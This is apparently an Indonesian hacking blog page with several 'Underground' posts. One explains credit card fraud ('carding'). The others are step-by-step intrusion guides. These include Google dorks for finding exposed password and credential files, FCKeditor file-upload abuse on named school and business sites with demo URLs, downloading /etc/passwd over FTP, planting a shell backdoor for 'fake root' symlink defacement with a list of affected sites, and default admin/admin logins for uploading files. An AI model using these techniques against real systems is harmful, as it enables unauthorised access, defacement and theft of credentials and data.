Blog Berita Terbaru, Tutorial Komputer, Internet Marketing, Komunitas Online Kediri, Hiburan, Program Memberikan Yang Terbaik, Saatnya Yang Muda Berbicara
Follower
Underground
mungkin dari sebagian pembaca masih asing dengan istilah ini, disini penulis akan menjelaskan apa itu carding dan bagaimana carding ini sendiri berjalan.
Carding adalah salah satu tindak kejahatan yang sering dilakukan di media komunikasi elektronik atau sering dikenal dengan internet, CyberCrime(kejahatan dunia maya), seperti kita ketahui bahwa tingkat pemakaian kartu kredit di indonesia sangat berkembang pesat bahkan di tahun 2007 tercatat jumlah pemegang kartu kredit mencapai 9,14 juta, anda bisa melihat rangkumannya disini, maka dari itu sangat perlu kita waspadai juga tangan-tangan nakal yang siap menguras habis isi kartu kredit anda.
ditinjau dari lain pihak, di negara-negara bagian asia, indonesia khususnya saat ini sudah memiliki suatu hukum baru perkenaan dengan dunia TI, atau juga dikenal dengan hukum siber(cyber law) atau hukum telematika, yaitu UU ITE (Informasi dan Transaksi Elektronik) No.11 tahun 2008.
carding adalah tindak kejahatan yang bersifat illegal interception, kemudian mengoperasikan kartu kredit tanpa adanya fisik, kartu tersebut lalu digunakan untuk berbelanja di merchant(toko) online, online shop.
perlu pembaca garis bawahi bahwasannya kartu kredit adalah merupakan alat pembayaran yang sah, namun kartu kredit tidak memiliki jaminan (unsecured loan) yang diberikan oleh bank penerbit kepada nasabah bank karena kredibilitas yang bersangkutan. Pengaturan kartu kredit mengacu pada ketentuan Bank Indonesia dan juga kebijakan masing-masing bank (self-regulatory bank). Oleh karena itu dalam prakteknya bank akan memberikan pengaturan yang menyangkut pedoman kerja bagi semua pejabat yang berwenang terhadap perkreditan dalam mengelola bisnis, sehingga tercapai keseimbangan antara kuantitas dan kualitas dalam portofolio dan risiko kredit.
hal-hal yang harus kita ketahui sebagai pengguna kartu kredit.

(Gambar diatas adalah alur transaksi kartu kredit)
adapun jenis transaksi kartu kredit bisa dibedakan menjadi 2 hal yaitu.
Card Present Transaction, adalah suatu transaksi yang dilakukan secara terang-terangan antara penjual dan pembeli, sama seperti sistem COD "Cash on Delivery" yang dilakukan oleh dua pelaku yaitu penjual dan pembeli secara langsung (face to face transaction).
Card-Absent (Non-Present) Transaction, adalah transaksi kartu kredit
secara tidak langsung (tanpa keberadaan Pemegang kartu dan fisik kartu kredit).
Lalu bagaimana modus, serta cara yang sering di gunakan oleh para carder(pelaku carding) ? mungkin pertanyaan itu yang sekarang ini mulai menyelimuti pikiran anda,? tentu bukan!
saya akan mencoba menjelaskan dan memberi gambaran bagaimana carding ini dijalankan oleh seoarang carder(pelaku carding).
Carding sendiri merupakan bagian cyber crime dalam transaksi perbankan yang menggunakan sarana internet sebagai basis transaksi khususnya sistem layanan perbankan online (online banking). Terjadinya carding oleh pelaku (carder) dengan cara memperoleh data kartu kredit secara tidak sah dengan memanfaatkan teknologi informasi (Internet)
yaitu menggunakan nomor kartu kredit orang lain untuk melakukan pemesanan barang secara online. Komunikasi awalnya dibangun melalui e-mail untuk menanyakan kondisi barang dan melakukan transaksi. Carding adalah transaksi fraud (penyimpangan) pelaku (fraudster) tidak harus memegang fisik dari kartu kredit. Seorang carder hanya memerlukan nomor kartu kredit dan beberapa informasi seperti expiry date dan CVC (Card Verification Code). Dalam industri kartu kredit, pihak bank penerbit mengenal carding sebagai tindakan Card Not Present (CNP) yang bisa berakibat pada penyimpangan (fraud) transaksi baik yang terjadi secara on-line dalam e-commerce maupun transaksi ritel off line.
Para carder juga tidak akan pernah kehabisan akal untuk selalu mencari celah, ketika penyelenggara mulai meningkatkan fitur keamanan dari kemungkinan timbulnya tindak kejahatan, para carder pun mencari celah melalui transaksi berbasis elektronik yang menggunakan email maupun website untukberbelanja online yang kerap mengharuskan para pemegang kartu untuk memberikan identitas mereka. Pada gilirannya pencurian identitas pada transaksi online meningkat. Dan ketika para penyelenggara memfokuskan pada peningkatan keamanan untuk berbelanja online, maka penyimpangan pada proses
penyampaian kartu dan aktivasinya meningkat. Menyangkut hal ini dalam industri kartu kredit terdapat kategori-kategori yang sering dilakukan oleh para carder, diantaranya :
Fraudulent Applications (FA)
Jenis fraud(penyimpangan) yang dilakukan fraudster
yang berpura-pura sebagai calon pemegang kartu asli dengan cara
memberikan data-data identitas palsu pada saat pengisian formulir
pengajuan kartu baik itu kartu kredit, ATM, dan Debet.
Lost and Stolen Cards. Setelah dicuri, biasanya carder memakai
kartu (biasanya kartu kredit atau kartu debit) untuk melakukan
pembelanjaan dengan nilai yang relative kecil tapi secara berangsur, bahkan sering. Hal ini bertujuan untuk mengurangi resiko si korban mengetahui bahwa kartu kredit telah dikuasai oleh carder, namun pada akhirnya sepandai-pandai tupai meloncat pasti akan terjatuh, peribahasa tersebut nampaknya pas untuk ditujukan kepada para pelaku carding.
Unauthorized Use of Account Numbers (CARDING). Hampir sama
dengan jenis penyimpangan yang sudah-sudah. Dalam hal ini carder menggunakan kartu yang bukan miliknya untuk melakukan pembelanjaan melalui mekanisme transaksi yang tidak membutuhkan keberadaaan kartu (card not present) dan transaksi bersifat online.
Account Takeover. jenis ini dilakukan oleh carder dengan cara
mengubah identitas pemilik kartu seperti alamat yang terdaftar pada
kartu yang telah ada sebelumnya. Seperti halnya sebuah salah satu teknik cracking yaitu "Spoofing/pemalsuan"
Not Received Items (NRI). Apakah teman-teman pembaca pernah mengajukan permohonan untuk memiliki kartu kredit tapi kartu tersebut tidak pernah sampai ke tangan Anda? Bisa jadi kartu atas nama Anda telah
di tangan carder. penyimpangan yang mungkin terjadi dan dikenal dengan istilah Not Received Items (NRI). Pelaku bisa saja adalah orang dalam maupun orang luar yang mendapatkan informasi mengenai pengiriman kartu.
Counterfeit Cards and Skimming. Jenis ini yang paling banyak
terjadi dan mekanismenya lebih canggih dibandingkan dengan penyimpangan jenis lain. Fraud(penyimpangan) jenis ini biasanya lebih sering terjadi pada kartu yang masih menggunakan magnetic stripe sebagai media penyimpan data.
Phising. Seiring kemajuan teknologi khususnya di internet, seperti kita ketahui phising adalah sebuah teknik dimana seorang carder membuat halaman yang sama persis dengan halaman awal"halaman login palsu" yang terkesan sulit dibedakan dengan situs asli.
bukan tidak mungkin lagi, jika anda terpancing oleh hal ini. maka isi keseluruhan kartu kredit anda akan dikuras habis oleh carder.
Mungkin hanya itu yang bisa penulis bagikan kepada teman-teman pembaca blog Cyber Hacker Kediri, semoga apa yang ditulis dan apa yang anda baca sekarang ini menjadi sebuah ilmu baru yang bermanfaat. jangan jadikan hal ini untuk perbuatan yang kurang baik. wassalaam
Underground

inurl:fckeditor/editor/filemanager/upload

Maka akan Muncul beberapa website :

Gue dah temuin web yang vuln yaitu :
http://www.dulam.com/includes/FCKeditor/editor/filemanager/upload/test.html
setelah menemukan target silahkan klik test.html


Klik Browse dan pilih file yang akan loe upload !!
Kalau sudah Klik "Send it to the server" . . . .

Berhasil dah !!
Di kolom "Uploaded File URL:" akan muncul tempat file yang loe upload tadi !!
Contoh punya gue :
/editor_files/Imagetested(3).html
Cara lihat file nya gini :
www.alamat_target_mu.com/editor_files/Imagetested(3).html
Contoh punya gue :
http://www.dulam.com/editor_files/Imagetested(3).html
Selamat Mencoba ^_^
Kalau masih bingung hubungi gue di Facebook :
Mr. /Dark_r00t<?
Underground
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contoh nya :
site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com
intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire
allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire
inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox
allinurl
Sama dengan Allintitle (hanya ini url)
filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire
contoh keren: filetype:doc skripsi IT
numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire
link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com
inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire
kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * – + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )
nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……
Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28
“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0
“Apache/* Server at” intitle:index.of
–> semua versi dari Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server
“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server
“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server
Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points
“This summary was generated by wwwstat”
–> web server statistics, system file structure
“These statistics were produced by getstats”
–>web server statistics, system file structure
“This report was generated by WebLog”
–>web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections
intitle:”ASP Stats Generator *.*” ”
–>ASP Stats
Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information
intitle:”Multimon UPS status page”
–>UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services
intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information
inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs
Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.
“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords
“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code
“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information
“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information
“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information
“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code
“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information
“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information
“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents
Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google
“http://*:*@www”
site passwords for site, stored as the string
“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords
filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information
intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ http://FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords
filetype:sql (“passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user
user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password” configuration files for WV Dial
ext:ini eudora.ini configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information
intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/
“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/
intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php
Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs
“not for distribution”
confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt “msn”
MSN contacts list
filetype:QDF
QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers
intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail
“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net
Underground
Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.
Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :
1.jalankan prompt
2.Tuliskan command untuk membuka dos command prompt
3.tuliskan ftp victim.com (nama server yg ingin di hacking !!)
4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
5.Akan muncul password login.. tekan saja enter…
6.sekarang ketiklah “quote user ftp” dan tekan enter
7.lalu ketik “quote cwd ~root” tekan enter
8.dan ketikan “quote pass ftp” tekan enter
Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin’ shit with that
9.ketiklah “cd etc” tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
10.ketiklah “get passwd” untuk mendownload passw.file ke HD mu
Dengan demikian kita sudah memiliki password file dari victim dan kita dapat membukanya di C:\passwd dengan menggunakan notepad
Jika file tersebut di enkripsi.. kamu bisa meng-crack.. dan jika tidak dienkripsi..berarti anda berhasil
kamu dapat mencocokan antara user login dg passwordnya.
Underground
Fake root .. Apa itu Fake root ..? sudah bisa kita telaah bahwasanya Fake berarti palsu .
Oke pada kesempatan kali ini saya akan membahas tentang tata cara dan bagaimana Fake root Itu sendiri di eksekusi/di jalankan pada satu server .
hal pertama yang anda lakukan adalah memasuki dulu sebuah website dengan cara entah apapun bisa menggunakan : sql inject , brute Force dll
saya disini memberi contoh anda jika anda sudah berhasil memasuki isi web tersebut .
Adapun hal selanjutnya sebagai berikut :
1 . Tanam shell backdoor anda di folder public_html usahakan di folder tersebut , lalu buka shell yang sudah anda tanam tadi dengan keyword public_html/namashellanda.php (www.siteanda.com/namashellanda.php)
2. buatlah suatu File deface sesuai nama yang anda inginkan di public_html/namfile.html (siteanda.com/namafile.html)
3 . Disini saya memberi contoh anda dengan shell injection v3.3 jika anda belum punya anda bisa mendownloadnya disini
4 . jika sudah anda memasang shell nya , sekarang mulailah lah menuju Symlink
5 . Saatnya kita mengecek hasil Fake root kita dengan keyword www.websiteyangtersangkutserver.com/~usernamewebsiteyang1dimasuki/namaFile.html
Contoh Fake Root :
http://eiffelhotel.com.ar/~micais/index.html
http://aeroglobal.com.ar/~micais/index.html
http://aeromentor.com.ar/~micais/index.html
http://agroaereos.com.ar/~micais/index.html
http://infraero.com.ar/~micais/index.html
http://aeropymes.com.ar/~micais/index.html
http://aeroargentina.com/~micais/index.html
http://asistenciaexpress.com/~micais/index.html
http://desarrollos-electronicos.com/~micais/index.html
http://aldomontev.com.ar/~micais/index.html
http://vdevoto.com/~micais/index.html
http://ipmeducar.com.ar/~micais/index.html
http://diswald.com/~micais/index.html
http://domenech.com.ar/~micais/index.html
http://alterd.com.ar/~micais/index.html
http://chocolonea.com.ar/~micais/index.html
http://marianochocolonea.com.ar/~micais/index.html
http://esteticayvida.com.ar/~micais/index.html
http://esteticayvida.com/~micais/index.html
http://ciencia-tecnica.com.ar/~micais/index.html
http://citypet.com.ar/~micais/index.html
http://arquigreen.com/~micais/index.html
http://colegiosanmarcelo.com.ar/~micais/index.html
http://cositmecos.org.ar/~micais/index.html
http://cuplasjac.com.ar/~micais/index.html
http://daloia.com.ar/~micais/index.html
http://darex.com.bo/~micais/index.html
http://guiadelocutores.com.ar/~micais/index.html
http://daylunch.com/~micais/index.html
Underground
Sebenarnya cara ini tidak begitu sulit di praktekan , tapi untuk sekedar belajar tak apalah . pas untuk yang masih newbie pengen belajar . oke langsung aja . tugas anda adalah sedikit mengexploit web target
dan mengupload file anda melalui photo gallery .
1. Dork in google : intext:”Powered by shop737” or ''Powered by bisnis 7'' => kembangin lagi
dorknya, semakin kreatif kamu, semakin banyak target yang didapat
Pilih 1 website target, masukkan exploit ini
exploit:
poto/upload.php
username : admin
password : admin
2. lalu carilah tempat mengupload file anda , seperti di gambar bawah
3 . buatlah kategory dengan nama yang anda inginkan contoh : Ambu
keterangan kategory : menurut keinginan anda lalu klik upload tapi disini hanya mendukung file jpg , png , txt
4. untuk menemukan dimana file anda terupload anda bisa mencarinya disini http://www.contoh.com/poto/index.php?imgdir=namakategoryamda
example : http://www.bahteragunajaya.com/poto/index.php?imgdir=Ambu
perlu di ingat : tidak semua web bisa dengan tutorial ini , carilah target dengan sabar !!!
Underground
Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
DORK bisa dikembangan menurut kreatifitas anda .
Exploit :
http://public_html/dir/editor/filemanager/connectors/uploadtest.html atau http://public_html/dir/editor/filemanager/connectors/test.html , http://public_html/editor/filemanager/browser/default/browser.html
pilih salah satu, kalau sudah langsung masukan exploitnya lalu pilih connector nya dari ASP => PHP tinggal masukin filenya harus berbentuk .TXT Seperti gambar diatas .
Demo:
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.smppd1bpp.com/editor/filemanager/connectors/uploadtest.html
http://smp1kudus.sch.id/editor/filemanager/connectors/uploadtest.html
Terakhir klik send it to server . untuk melihat file txt anda tadi bisa dengan cara http://contoh.com/userfiles/filename.txt
example : http://smp1kudus.sch.id/userfiles/ambu_.txt
jika muncul pesan : File not error , berarti file anda behasil di upload jika tidak . carilah target yang lain
Top 5 Popular of The Week
-
H allo suatu kabar gembira saudara , kini Blackberry telah meluncurkan BBM untuk merk OS Android dan Ios . Suatu kabar gembira bukan ,...
-
Sebenarnya cara ini tidak begitu sulit di praktekan , tapi untuk sekedar belajar tak apalah . pas untuk yang masih newbie pengen belajar . o...
-
A . P ada kese mpatan kali ini saya akan membahas tentang Serangan Distributed Denial of Service ( DDoS ) Attack kepada web ser...
-
Selamat jumpa kembali para pembaca :D , Kali ini penulis akan sedikit membahas tentang error pada metasploit yang baru saja di upgrade. p...
-
Fake root .. Apa itu Fake root ..? sudah bisa kita telaah bahwasanya Fake berarti palsu . Oke pada kesempatan kali ini saya akan membahas t...